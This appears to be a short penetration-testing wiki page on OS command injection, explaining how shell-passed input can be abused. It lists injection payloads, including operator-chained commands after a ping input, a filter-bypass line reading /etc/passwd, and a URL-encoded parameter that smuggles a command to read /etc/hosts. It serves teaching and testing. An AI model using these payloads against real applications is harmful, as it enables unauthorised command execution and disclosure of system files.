OS Command injection

Allow to execute arbitrary system commands on a host operating system via a vulnerable application. Normally happens when a web application takes a user-supplied input and passes it directly to a shell interpreter.

We can find a typical example of this vulnerability as follows:

  • When internally using functions like system or shell_exec which pass input to an internal command interpreter

#We send a petition with a command
curl -X POST http://url/? -d "cmd=whoami"
#If being handled by system(), it will respond with the output of the command, letting us we can talk to the internal shell

  • In some cases, the application will receive input and redirect it to an internal command executed in the server shell

#A form receives the IP as input and executes the ping command
8.8.8.8
#Example output
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=117 time=26.4 ms
...
#Ww see that it works like the following command inside
ping $input

  • We can abuse this input to add other commands using the command operators

8.8.8.8; ls -la
8.8.8.8 & ls -la    
8.8.8.8 && ls -la
8.8.8.8 | ls -la
8.8.8.8 || ls -la

  • Sometimes it could be sanitized to detect these symbols, so to avoid detection, we can combine operators and commands into a single string, which helps bypass filtering

8.8.8.8|cat /etc/passwd

  • This could also work on request parameters that are passed to an internal OS command

#Example, the parameters are pass to and 
Content-Type: application/x-www-form-urlencoded
Id=15&name=a

# We could concatenate commands
Content-Type: application/x-www-form-urlencoded
Id=15&name=a%26cat%20%2fetc%2fhosts #Concatenating |cat /etc/hosts
PreviousCross-Site ScriptingNextXXE Injection

Last updated